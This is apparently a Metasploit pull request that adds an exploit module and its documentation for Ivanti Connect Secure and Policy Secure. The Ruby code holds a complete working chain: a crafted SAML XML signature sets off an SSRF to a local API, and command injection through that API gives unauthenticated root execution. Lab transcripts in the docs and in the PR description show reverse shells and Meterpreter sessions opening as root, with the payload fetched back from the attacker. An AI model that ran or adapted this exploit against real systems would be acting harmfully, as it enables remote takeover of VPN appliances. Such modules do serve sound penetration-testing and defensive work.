### PR TITLE
Ivanti Connect Secure - Unauth RCE (CVE-2024-21893 + CVE-2024-21887)

### DIFF
--- a/documentation/modules/exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893.md
+++ b/documentation/modules/exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893.md
@@ -20,22 +20,19 @@ below steps are for HyperV, but it should be very similar to install on VMWare.
 1. Start msfconsole
 2. `use exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893`
 3. `set RHOST <TARGET_IP_ADDRESS>`
-4. `set target 0`
-5. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp`
-6. `check`
-7. `exploit`
+4. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp`
+5. `check`
+6. `exploit`
 
 ## Scenarios
-To support a broad set of available payloads, we support both a Linux target and a Unix Target. This allows for native
+To support a broad set of available payloads, we support both the Linux and Unix platforms. This allows for native
 Linux payloads to be used, but also payloads like Python meterpreter or a Bash shell.
 
-### Linux Target
+### Automatic (Linux Payload)
 
 ```
 msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set RHOST 192.168.86.111
 RHOST => 192.168.86.111
-msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set target 0
-target => 0
 msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
 PAYLOAD => cmd/linux/http/x64/meterpreter/reverse_tcp
 msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > show options
@@ -44,33 +41,48 @@ Module options (exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893):
 
    Name     Current Setting  Required  Description
    ----     ---------------  --------  -----------
-   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS   192.168.86.111   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   Proxies                   no        A proxy chain of format type:host:port[
+                                       ,type:host:port][...]
+   RHOSTS   192.168.86.111   yes       The target host(s), see https://docs.me
+                                       tasploit.com/docs/using-metasploit/basi
+                                       cs/using-metasploit.html
    RPORT    443              yes       The target port (TCP)
-   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   SSL      true             no        Negotiate SSL/TLS for outgoing connecti
+                                       ons
    VHOST                     no        HTTP server virtual host
 
 
 Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
 
-   Name                Current Setting  Required  Description
-   ----                ---------------  --------  -----------
-   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
-   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
-   FETCH_FILENAME      BiLTwvbxndD      no        Name to use on remote system when storing payload; cannot contain spaces.
-   FETCH_SRVHOST                        no        Local IP to use for serving payload
-   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
-   FETCH_URIPATH                        no        Local URI to use for serving payload
-   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces.
-   LHOST               eth0             yes       The listen address (an interface may be specified)
-   LPORT               4444             yes       The listen port
+   Name               Current Setting  Required  Description
+   ----               ---------------  --------  -----------
+   FETCH_COMMAND      CURL             yes       Command to fetch payload (Acc
+                                                 epted: CURL, FTP, TFTP, TNFTP
+                                                 , WGET)
+   FETCH_DELETE       false            yes       Attempt to delete the binary
+                                                 after execution
+   FETCH_FILENAME     XMZdmHhNxYx      no        Name to use on remote system
+                                                 when storing payload; cannot
+                                                 contain spaces.
+   FETCH_SRVHOST                       no        Local IP to use for serving p
+                                                 ayload
+   FETCH_SRVPORT      8080             yes       Local port to use for serving
+                                                  payload
+   FETCH_URIPATH                       no        Local URI to use for serving
+                                                 payload
+   FETCH_WRITABLE_DI  /tmp             yes       Remote writable dir to store
+   R                                             payload; cannot contain space
+                                                 s.
+   LHOST              eth0             yes       The listen address (an interf
+                                                 ace may be specified)
+   LPORT              4444             yes       The listen port
 
 
 Exploit target:
 
    Id  Name
    --  ----
-   0   Linux Command
+   0   Automatic
 
 
 
@@ -84,7 +96,7 @@ msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > exploit
 [*] Running automatic check ("set AutoCheck false" to disable)
 [!] The service is running, but could not be validated.
 [*] Sending stage (3045380 bytes) to 192.168.86.111
-[*] Meterpreter session 4 opened (192.168.86.42:4444 -> 192.168.86.111:49328) at 2024-02-06 11:38:33 +0000
+[*] Meterpreter session 3 opened (192.168.86.42:4444 -> 192.168.86.111:45734) at 2024-02-09 09:21:59 +0000
 
 meterpreter > getuid
 Server username: root
@@ -104,17 +116,15 @@ export DSREL_DEPS=ive
 export DSREL_BUILDNUM=1647
 export DSREL_COMMENT="R1"
 meterpreter > exit
-[*] Shutting down session: 4
+[*] Shutting down session: 3
 
-[*] 192.168.86.111 - Meterpreter session 4 closed.  Reason: User exit
+[*] 192.168.86.111 - Meterpreter session 3 closed.  Reason: Died
 msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > 
 ```
 
-### Unix Target
+### Automatic (Unix Payload)
 
 ```
-msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set target 1
-target => 1
 msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set PAYLOAD cmd/unix/reverse_bash
 PAYLOAD => cmd/unix/reverse_bash
 msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > show options
@@ -123,10 +133,14 @@ Module options (exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893):
 
    Name     Current Setting  Required  Description
    ----     ---------------  --------  -----------
-   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
-   RHOSTS   192.168.86.111   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   Proxies                   no        A proxy chain of format type:host:port[
+                                       ,type:host:port][...]
+   RHOSTS   192.168.86.111   yes       The target host(s), see https://docs.me
+                                       tasploit.com/docs/using-metasploit/basi
+                                       cs/using-metasploit.html
    RPORT    443              yes       The target port (TCP)
-   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   SSL      true             no        Negotiate SSL/TLS for outgoing connecti
+                                       ons
    VHOST                     no        HTTP server virtual host
 
 
@@ -134,7 +148,8 @@ Payload options (cmd/unix/reverse_bash):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
-   LHOST  eth0             yes       The listen address (an interface may be specified)
+   LHOST  eth0             yes       The listen address (an interface may be s
+                                     pecified)
    LPORT  4444             yes       The listen port
 
 
@@ -142,7 +157,7 @@ Exploit target:
 
    Id  Name
    --  ----
-   1   Unix Command
+   0   Automatic
 
 
 
@@ -155,7 +170,7 @@ msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > exploit
 [*] Started reverse TCP handler on 192.168.86.42:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [!] The service is running, but could not be validated.
-[*] Command shell session 5 opened (192.168.86.42:4444 -> 192.168.86.111:49330) at 2024-02-06 11:39:45 +0000
+[*] Command shell session 4 opened (192.168.86.42:4444 -> 192.168.86.111:45736) at 2024-02-09 09:23:15 +0000
 
 id
 uid=0(root) gid=0(root) groups=0(root)
@@ -169,6 +184,6 @@ export DSREL_DEPS=ive
 export DSREL_BUILDNUM=1647
 export DSREL_COMMENT="R1"
 exit
-[*] 192.168.86.111 - Command shell session 5 closed.
+[*] 192.168.86.111 - Command shell session 4 closed.
 msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > 
 ```

--- a/documentation/modules/exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893.md
+++ b/documentation/modules/exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893.md
@@ -1,0 +1,174 @@
+## Vulnerable Application
+This module chains a server side request forgery (SSRF) vulnerability (CVE-2024-21893) and a command injection
+vulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti
+Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and
+22.x are vulnerable, prior to the vendor patch released on Feb 1, 2024. It is unknown if unsupported versions
+8.x and below are also vulnerable.
+
+## Testing
+To test we used Ivanti Connect Secure version 22.3R1 (build 1647), deployed as a virtual appliance for HyperV. The
+below steps are for HyperV, but it should be very similar to install on VMWare.
+
+* Signup for a trial to download the file `ps-ics-hyper-v-isa-v-22.3r1.0-b1647-package.zip`
+* From this ZIP file, extract the file `ISA-V-HYPERV-ICS-22.3R1-1647.1-VT-hyperv.vhdx`
+* Create a new VM in HyperV and specify the VHDX file as the hard drives media.
+* Boot the VM and follow the console instructions to install the product.
+* After installation completes, you will have created an admin account and password. You can log into the admin
+  web interface by visiting https://<TARGET_IP_ADDRESS>/admin in your web browser if you want.
+
+## Verification Steps
+1. Start msfconsole
+2. `use exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set target 0`
+5. `set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp`
+6. `check`
+7. `exploit`
+
+## Scenarios
+To support a broad set of available payloads, we support both a Linux target and a Unix Target. This allows for native
+Linux payloads to be used, but also payloads like Python meterpreter or a Bash shell.
+
+### Linux Target
+
+```
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set RHOST 192.168.86.111
+RHOST => 192.168.86.111
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set target 0
+target => 0
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set PAYLOAD cmd/linux/http/x64/meterpreter/reverse_tcp
+PAYLOAD => cmd/linux/http/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > show options
+
+Module options (exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.86.111   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    443              yes       The target port (TCP)
+   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      BiLTwvbxndD      no        Name to use on remote system when storing payload; cannot contain spaces.
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces.
+   LHOST               eth0             yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > check
+[*] 192.168.86.111:443 - The service is running, but could not be validated.
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated.
+[*] Sending stage (3045380 bytes) to 192.168.86.111
+[*] Meterpreter session 4 opened (192.168.86.42:4444 -> 192.168.86.111:49328) at 2024-02-06 11:38:33 +0000
+
+meterpreter > getuid
+Server username: root
+meterpreter > sysinfo
+Computer     : 192.168.86.111
+OS           :  (Linux 4.15.18.34-production)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > cat /home/ssl-vpn-VERSION
+export DSREL_MAJOR=22
+export DSREL_MINOR=3
+export DSREL_MAINT=1
+export DSREL_DATAVER=4802
+export DSREL_PRODUCT=ssl-vpn
+export DSREL_DEPS=ive
+export DSREL_BUILDNUM=1647
+export DSREL_COMMENT="R1"
+meterpreter > exit
+[*] Shutting down session: 4
+
+[*] 192.168.86.111 - Meterpreter session 4 closed.  Reason: User exit
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > 
+```
+
+### Unix Target
+
+```
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set target 1
+target => 1
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > set PAYLOAD cmd/unix/reverse_bash
+PAYLOAD => cmd/unix/reverse_bash
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > show options
+
+Module options (exploit/linux/http/ivanti_connect_secure_rce_cve_2024_21893):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.86.111   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT    443              yes       The target port (TCP)
+   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  eth0             yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Unix Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > check
+[*] 192.168.86.111:443 - The service is running, but could not be validated.
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > exploit
+
+[*] Started reverse TCP handler on 192.168.86.42:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated.
+[*] Command shell session 5 opened (192.168.86.42:4444 -> 192.168.86.111:49330) at 2024-02-06 11:39:45 +0000
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+cat /home/ssl-vpn-VERSION
+export DSREL_MAJOR=22
+export DSREL_MINOR=3
+export DSREL_MAINT=1
+export DSREL_DATAVER=4802
+export DSREL_PRODUCT=ssl-vpn
+export DSREL_DEPS=ive
+export DSREL_BUILDNUM=1647
+export DSREL_COMMENT="R1"
+exit
+[*] 192.168.86.111 - Command shell session 5 closed.
+msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > 
+```

--- a/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2024_21893.rb
+++ b/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2024_21893.rb
@@ -1,0 +1,146 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Ivanti Connect Secure Unauthenticated Remote Code Execution',
+        'Description' => %q{
+          This module chains a server side request forgery (SSRF) vulnerability (CVE-2024-21893) and a command injection
+          vulnerability (CVE-2024-21887) to exploit vulnerable instances of either Ivanti Connect Secure or Ivanti
+          Policy Secure, to achieve unauthenticated remote code execution. All currently supported versions 9.x and
+          22.x are vulnerable, prior to the vendor patch released on Feb 1, 2024. It is unknown if unsupported versions
+          8.x and below are also vulnerable.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'sfewer-r7', # MSF Exploit & Rapid7 Analysis
+        ],
+        'References' => [
+          ['CVE', '2024-21893'], # The SSRF as Ivanti reported it, but it is actually an existing vuln in the library xmltooling.
+          ['CVE', '2023-36661'], # The original SSRF CVE id in xmltooling, as disclosed by Shibboleth.
+          ['CVE', '2024-21887'], # The command injection vulnerability (Ivanti grouped several under one CVE).
+          ['URL', 'https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis'], # Rapid7 Analysis of CVE-2024-21893
+          ['URL', 'https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis'], # Rapid7 Analysis of CVE-2024-21887
+          ['URL', 'https://forums.ivanti.com/s/article/CVE-2024-21888-Privilege-Escalation-for-Ivanti-Connect-Secure-and-Ivanti-Policy-Secure'],
+          ['URL', 'https://shibboleth.net/community/advisories/secadv_20230612.txt']
+        ],
+        'DisclosureDate' => '2024-01-31',
+        'Platform' => %w[linux unix],
+        'Arch' => [ARCH_CMD],
+        'Privileged' => true, # Code execution as root.
+        'Targets' => [
+          [
+            # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:
+            # cmd/linux/http/x64/meterpreter/reverse_tcp
+            # cmd/linux/http/x64/shell/reverse_tcp
+            # cmd/linux/http/x86/shell/reverse_tcp
+            'Linux Command',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_CMD]
+            },
+          ],
+          [
+            # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:
+            # cmd/unix/python/meterpreter/reverse_tcp
+            # cmd/unix/reverse_bash
+            # cmd/unix/reverse_python
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => [ARCH_CMD]
+            },
+          ]
+        ],
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true,
+          'FETCH_WRITABLE_DIR' => '/tmp'
+        },
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS]
+        }
+      )
+    )
+  end
+
+  def check
+    # We get a static resource that contains an old banner circa 2018. The product "Connect Secure" was acquired by
+    # Ivanti when Ivanti acquired "Pulse Secure", so we look for this string. This lets us confirm the target is running
+    # the product "Connect Secure" (Tested against 22.3R1). We do not have an unauthenticated method to get a version
+    # number, so this check routine can only return either Detected or Unknown.
+
+    # This exploit chain based on CVE-2024-21893 bypasses a mitigation for an earlier exploit chain, based upon
+    # CVE-2023-46805. Therefore, we dont leverage CVE-2023-46805 to access the /api/v1/system/system-information
+    # endpoint for version information, as we assume the target has the first Ivanti mitigation applied. If the target
+    # has not had the first mitigation applied, then the exploit ivanti_connect_secure_rce_cve_2023_46805 will work.
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => '/dana-na/css/visibility.css'
+    )
+
+    return CheckCode::Unknown('Connection failed') unless res
+
+    return CheckCode::Safe if res.code != 200
+
+    if res.body.include? 'Pulse Secure'
+      return CheckCode::Detected
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    # The SSRF URL we use targets a Python backend service bound to 127.0.0.1:8090. This backend service is vulnerable
+    # to an unauthenticated command injection vulnerability (CVE-2024-21887).
+    # Note: Ivanti grouped multiple command injection vulnerabilities into CVE-2024-21887. We choose one that can be
+    # triggered via a single HTTP GET request, as this is what the SSRF gives us (i.e. The SSRF does not perform a POST
+    # request).
+    ssrf_url = "http://127.0.0.1:8090/api/v1/license/keys-status/#{Rex::Text.uri_encode(";#{payload.encoded} #")}"
+
+    # CVE-2024-21893 is an SSRF in the xmltooling library when processing a Signature with a KeyInfo element. The
+    # KeyInfo element can have a RetrievalMethod element with a URI attribute that points to a remote resource. The
+    # xmltooling library will perform a HTTP GET request to this URI, giving us an SSRF exploit primitive.
+    # While Ivanti reported this as CVE-2024-21893, it is actually CVE-2023-36661 and was patched by the upstream vendor
+    # several months prior to being exploited in the wild in Ivanti Connect Secure.
+    xmp_data = %(<?xml version="1.0" encoding="UTF-8"?>
+    <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
+      <soap:Body>
+        <ds:Signature
+        xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
+          <ds:SignedInfo>
+            <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/>
+            <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>
+          </ds:SignedInfo>
+          <ds:SignatureValue>#{Rex::Text.rand_text_hex(20)}</ds:SignatureValue>
+          <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
+            <ds:RetrievalMethod URI="#{ssrf_url}"/>
+            <ds:X509Data/>
+          </ds:KeyInfo>
+          <ds:Object></ds:Object>
+        </ds:Signature>
+      </soap:Body>
+    </soap:Envelope>)
+
+    send_request_cgi(
+      'method' => 'POST',
+      'uri' => '/dana-ws/saml20.ws',
+      'ctype' => 'text/xml',
+      'data' => xmp_data
+    )
+  end
+end

--- a/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2024_21893.rb
+++ b/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2024_21893.rb
@@ -117,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # xmltooling library will perform a HTTP GET request to this URI, giving us an SSRF exploit primitive.
     # While Ivanti reported this as CVE-2024-21893, it is actually CVE-2023-36661 and was patched by the upstream vendor
     # several months prior to being exploited in the wild in Ivanti Connect Secure.
-    xmp_data = %(<?xml version="1.0" encoding="UTF-8"?>
+    xml_data = %(<?xml version="1.0" encoding="UTF-8"?>
     <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
       <soap:Body>
         <ds:Signature
@@ -140,7 +140,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'POST',
       'uri' => '/dana-ws/saml20.ws',
       'ctype' => 'text/xml',
-      'data' => xmp_data
+      'data' => xml_data
     )
   end
 end

--- a/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2024_21893.rb
+++ b/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2024_21893.rb
@@ -39,28 +39,14 @@ class MetasploitModule < Msf::Exploit::Remote
         'Arch' => [ARCH_CMD],
         'Privileged' => true, # Code execution as root.
         'Targets' => [
-          [
-            # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:
-            # cmd/linux/http/x64/meterpreter/reverse_tcp
-            # cmd/linux/http/x64/shell/reverse_tcp
-            # cmd/linux/http/x86/shell/reverse_tcp
-            'Linux Command',
-            {
-              'Platform' => 'linux',
-              'Arch' => [ARCH_CMD]
-            },
-          ],
-          [
-            # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:
-            # cmd/unix/python/meterpreter/reverse_tcp
-            # cmd/unix/reverse_bash
-            # cmd/unix/reverse_python
-            'Unix Command',
-            {
-              'Platform' => 'unix',
-              'Arch' => [ARCH_CMD]
-            },
-          ]
+          # Tested against Ivanti Connect Secure version 22.3R1 (build 1647) with the following payloads:
+          # cmd/linux/http/x64/meterpreter/reverse_tcp
+          # cmd/linux/http/x64/shell/reverse_tcp
+          # cmd/linux/http/x86/shell/reverse_tcp
+          # cmd/unix/python/meterpreter/reverse_tcp
+          # cmd/unix/reverse_bash
+          # cmd/unix/reverse_python
+          ['Automatic', {}]
         ],
         'DefaultOptions' => {
           'RPORT' => 443,


### PR DESCRIPTION
This module exploits the recently disclosed SSRF vulnerability (CVE-2024-21893) in Ivanti Connect Secure and Ivanti Policy Secure. The SSRF is chained to a command injection vulnerability (CVE-2024-21887) to achieve unauthenticated RCE.

For a technical analysis of the SSRF vuln, please read our [Rapid7 analysis](https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis).

For a technical analysis of the command injection vuln, please read our other [Rapid7 analysis](https://attackerkb.com/topics/AdUh6by52K/cve-2023-46805/rapid7-analysis).

This exploit can bypass the mitigation `mitigation.release.20240107.1.xml` from Ivanti, but the mitigation `mitigation.release.20240126.5.xml` will successfully prevent the exploit from working. Ivanti have started rolling out patches (as of Feb 1, 2024) for all these vulnerabilities.

The `check` routine does not get a version number as I did not want to reuse the [check technique](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/ivanti_connect_secure_rce_cve_2023_46805.rb#L82) that leverages CVE-2023-46805 in the previous Ivanti exploit, as the assumption is the target may have the first mitigation applied (so we cant leverage CVE-2023-46805). I experimented using the SSRF to pull version information form the backend Python REST API, but the results are not returned to the attacker.

## Example

```
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > check
[*] 192.168.86.111:443 - The service is running, but could not be validated.
msf6 exploit(linux/http/ivanti_connect_secure_rce_cve_2024_21893) > exploit
[*] Started reverse TCP handler on 192.168.86.42:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (3045380 bytes) to 192.168.86.111
[*] Meterpreter session 4 opened (192.168.86.42:4444 -> 192.168.86.111:49328) at 2024-02-06 11:38:33 +0000
meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.86.111
OS           :  (Linux 4.15.18.34-production)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > cat /home/ssl-vpn-VERSION
export DSREL_MAJOR=22
export DSREL_MINOR=3
export DSREL_MAINT=1
export DSREL_DATAVER=4802
export DSREL_PRODUCT=ssl-vpn
export DSREL_DEPS=ive
export DSREL_BUILDNUM=1647
export DSREL_COMMENT="R1"
```